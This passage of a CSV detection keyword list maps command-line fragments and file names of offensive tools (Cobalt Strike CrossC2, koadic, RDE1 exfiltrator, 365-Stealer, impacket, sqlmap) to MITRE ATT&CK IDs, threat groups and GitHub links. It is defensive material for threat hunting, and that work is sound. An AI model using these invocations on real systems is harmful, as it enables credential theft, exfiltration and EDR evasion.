- TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-Vnc.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --convert_idrsa_pub --publickey $HOME/.ssh/id_rsa.pub*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --copy-file --source-file *.docx --target-file *.docx --target-volume *,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -* core.payload *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -* core.stager *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -* couchdb-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* couchdb-stats.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --crack-status*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --crawl=*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* crawler.py -u http*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,0,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -* crde_arm_musl https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_armv7 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_debug https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_linux https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_linux_aarch64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_linux_x86_64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_macos https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_release https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_windows https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_windows_x64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_windows_x86 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* --createpub -n 7828374823761928712873129873981723...12837182 -e 65537*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* Cred_Dump.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -* credentials /pvk:*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* creds-summary.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* CrossC2 Listener*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -* CrossC2.*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -* CrossC2Kit *,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,0,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -* CSExec.py*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -CShardDLLBytes*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* cups-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cups-queue-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --custom_user_agent*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* --custom-steal,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -* --custom-steal listusers*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -* --custom-steal onedrive*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -* --custom-steal onenote*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -* --custom-steal outlook*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -* --cve=* --command*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* CVE-2023-38831-RaRCE*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -* cvs-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cvs-brute-repository.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -d * -dc * -nu 'neo4j' -np *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -d * -n * -m reverse*=,offensive_tool_keyword,InvisibilityCloak,Proof-of-concept obfuscation toolkit for C# post-exploitation tools,T1027 - T1059.003 - T1140 - T1107,TA0004 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/h4wkst3r/InvisibilityCloak,1,0,N/A,N/A,4,375,147,2022-07-22T14:13:53Z,2021-05-19T14:19:49Z -* -d * -n * -m rot13*,offensive_tool_keyword,InvisibilityCloak,Proof-of-concept obfuscation toolkit for C# post-exploitation tools,T1027 - T1059.003 - T1140 - T1107,TA0004 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/h4wkst3r/InvisibilityCloak,1,0,N/A,N/A,4,375,147,2022-07-22T14:13:53Z,2021-05-19T14:19:49Z -* -d * -t axfr >*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -d * -t zonewalk > *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -d * -t zonewalk*,offensive_tool_keyword,dnsrecon,DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.,T1590 - T1590.001,TA0001 - TA0007,N/A,N/A,Information Gathering,https://github.com/darkoperator/dnsrecon,1,1,N/A,6,10,2336,516,2023-09-11T05:14:02Z,2010-12-16T03:25:49Z -* -d * -u * -p * --listener * --target *$DC_HOST*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -d * -u *\* -p * --da*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,0,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -* -d *Active Protection DLL for SylantStrike*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -* -d:sleepmask*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -* daap-get-library.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -daisyserver *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* darkcodersc *,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,0,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -* darkexe.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -* daytime.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* db2-das-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --dbms=mysql -u *,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* --dc * -m custom --filter *objectCategory*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -dc-host * -spn * -impersonate *,offensive_tool_keyword,Pachine,Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation),T1068 - T1078 - T1059.006,TA0003 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/ly4k/Pachine,1,0,N/A,8,3,262,37,2022-01-13T12:35:19Z,2021-12-13T23:15:05Z -* -dc-ip * -so *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -dc-ip * -computer-pass *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral 